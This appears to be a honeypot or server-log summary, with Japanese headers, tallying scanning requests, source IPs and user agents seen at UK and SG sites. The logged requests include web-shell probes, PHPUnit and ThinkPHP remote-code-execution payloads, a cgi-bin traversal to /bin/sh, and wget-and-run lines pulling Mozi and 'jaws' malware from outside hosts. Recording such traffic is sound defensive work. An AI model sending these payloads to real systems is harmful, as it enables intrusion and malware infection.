1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-admin/ALFA_DATA`	HTTP/1.1
1	GET	`/wp-admin/alfacgiapi`	HTTP/1.1
1	GET	`/wp-admin/cgialfa`	HTTP/1.1
1	GET	`/wp-admin/style.php`	HTTP/1.1
1	GET	`/wp-backup-sql-302.php`	HTTP/1.1
1	GET	`/wp-booking.php`	HTTP/1.1
1	GET	`/wp-content/ALFA_DATA`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`/wp-content/alfacgiapi`	HTTP/1.1
1	GET	`/wp-content/cgialfa`	HTTP/1.1
1	GET	`/wp-content/db-cache.php`	HTTP/1.1
1	GET	`/wp-content/export.php`	HTTP/1.1
1	GET	`/wp-content/mu-plugins/db-safe-mode.php`	HTTP/1.1
1	GET	`/wp-content/outcms.php?up`	HTTP/1.1
1	GET	`/wp-content/plugins/backup_index.php`	HTTP/1.1
1	GET	`/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en`	HTTP/1.1
1	GET	`/wp-content/plugins/ubh/up.php`	HTTP/1.1
1	GET	`/wp-content/plugins/wpconfig.bak.php?act=sf`	HTTP/1.1
1	GET	`/wp-content/themes/config.bak.php`	HTTP/1.1
1	GET	`/wp-content/uploads/ALFA_DATA`	HTTP/1.1
1	GET	`/wp-content/uploads/alfacgiapi`	HTTP/1.1
1	GET	`/wp-content/uploads/cgialfa`	HTTP/1.1
1	GET	`/wp-includes/ALFA_DATA`	HTTP/1.1
1	GET	`/wp-includes/alfacgiapi`	HTTP/1.1
1	GET	`/wp-includes/cgialfa`	HTTP/1.1
1	GET	`/wp-includes/css/css.php`	HTTP/1.1
1	GET	`/wp-includes/css/wp-config.php`	HTTP/1.1
1	GET	`/wp-includes/images/css.php`	HTTP/1.1
1	GET	`/wp-includes/wp-atom.php`	HTTP/1.1
1	GET	`/wp-includes/wp-class.php`	HTTP/1.1
1	GET	`/wp-load.php`	HTTP/1.1
1	GET	`/wp-plugins.php`	HTTP/1.1
1	GET	`/wp-signin.php?dizo&ping`	HTTP/1.1
1	GET	`/wp.php`	HTTP/1.1
1	GET	`/wp_wrong_datlib.php`	HTTP/1.1
1	GET	`/wso.php`	HTTP/1.1
1	GET	`/x.php`	HTTP/1.1
1	GET	`/xleet.php`	HTTP/1.1
1	GET	`/z.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.104.138.168	United States
1	20.150.210.254	United States
1	27.47.43.170	China
1	42.227.149.85	China
1	42.231.65.236	China
1	43.131.66.209	Singapore
1	54.164.20.251	United States
1	54.234.77.226	United States
1	64.62.197.113	United States
2	66.240.192.82	United States
2	107.182.129.239	United States
2	109.237.103.9	Russia
1	141.98.9.13	Lithuania
2	143.198.174.30	United States
1	167.248.133.118	United States
1	167.248.133.120	United States
16	185.7.214.117	Hong Kong
1	189.163.24.34	Mexico
1	192.241.216.88	United States
1	193.124.7.9	Czechia
1	198.235.24.130	United States
1	209.141.55.120	United States

UserAgent一覧

件数	UserAgent
11	`-`
1	`Go-http-client/1.1`
2	`Hello, world`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
16	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
2	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Python-urllib/3.6`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`\x03`
1		`\x16\x03\x01\x01D\x01`
4		`\x16\x03\x01`
4	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
2	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
2	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/config/getuser?index=0`	HTTP/1.1
2	GET	`/console/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synss[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.125.130.149	United States
1	20.150.210.254	United States
14	51.79.29.48	Canada
1	54.234.77.226	United States
1	65.49.20.111	United States
1	66.240.192.82	United States
8	70.37.91.245	United States
1	77.87.0.1	Poland
1	95.161.131.235	Antigua and Barbuda
1	104.208.84.26	United States
1	107.182.129.239	United States
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	141.98.9.13	Lithuania
2	143.198.174.30	United States
1	167.94.138.62	United States
15	185.7.214.117	Hong Kong
4	185.142.236.41	Seychelles
4	185.142.236.43	Seychelles
8	185.254.196.223	Ukraine
1	192.241.205.247	United States
1	198.235.24.30	United States

UserAgent一覧

件数	UserAgent
14	`-`
1	`Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Mobile Safari/537.36`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
15	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
1		`\x03`
2		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01`
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
27	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
2	GET	`/.well-known/security.txt`	HTTP/1.1
2	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=4ciig9k9`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/config/getuser?index=0`	HTTP/1.1
2	GET	`/console/`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/invoker/readonly`	HTTP/1.1
1	GET	`/jenkins/login`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/_ignition/execute-solution`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0